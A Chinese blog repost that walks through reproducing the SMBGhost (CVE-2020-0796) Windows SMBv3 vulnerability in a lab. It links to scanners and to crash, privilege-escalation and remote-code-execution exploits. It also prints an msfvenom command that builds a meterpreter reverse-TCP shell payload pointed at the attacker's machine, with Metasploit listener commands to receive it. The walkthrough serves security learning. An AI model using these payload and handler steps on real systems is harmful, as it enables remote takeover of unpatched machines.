我是靠谱客的博主 生动爆米花,最近开发中收集的这篇文章主要介绍CVE-2020-0796 漏洞复现,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

0x00 漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

0x01 影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.1,1903和1909

0x02 环境搭建

Win10漏洞环境
win10:192.168.111.13 关闭防火墙
kali:192.168.111.3

0x03 漏洞检测

python版本

https://github.com/ollypwn/SMBGhost
在这里插入图片描述

exe版本(奇安信)

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
在这里插入图片描述
这里需要注意的是测试环境需要关闭防火墙

0x04 漏洞攻击

蓝屏Poc

https://github.com/eerykitty/CVE-2020-0796-PoC
在这里插入图片描述
在这里插入图片描述

本地提权

https://github.com/danigargu/CVE-2020-0796/releases
在这里插入图片描述

远程攻击

https://github.com/chompie1337/SMBGhost_RCE_PoC
下载该脚本,利用kali生成反弹shell的shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=4444 -f py -o exp.py

在这里插入图片描述
然后利用生成的shellcode替换exploit.py中的USER_PAYLOAD
在这里插入图片描述
打开msf,监听本地4444端口

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.111.3
run

运行exploit.py脚本,反弹shell
在这里插入图片描述
这个脚本运行的时候确实不是很稳定,需要多尝试几次

0x05 参考

https://xz.aliyun.com/t/7440

最后

以上就是生动爆米花为你收集整理的CVE-2020-0796 漏洞复现的全部内容,希望文章能够帮你解决CVE-2020-0796 漏洞复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(44)

评论列表共有 0 条评论

立即
投稿
返回
顶部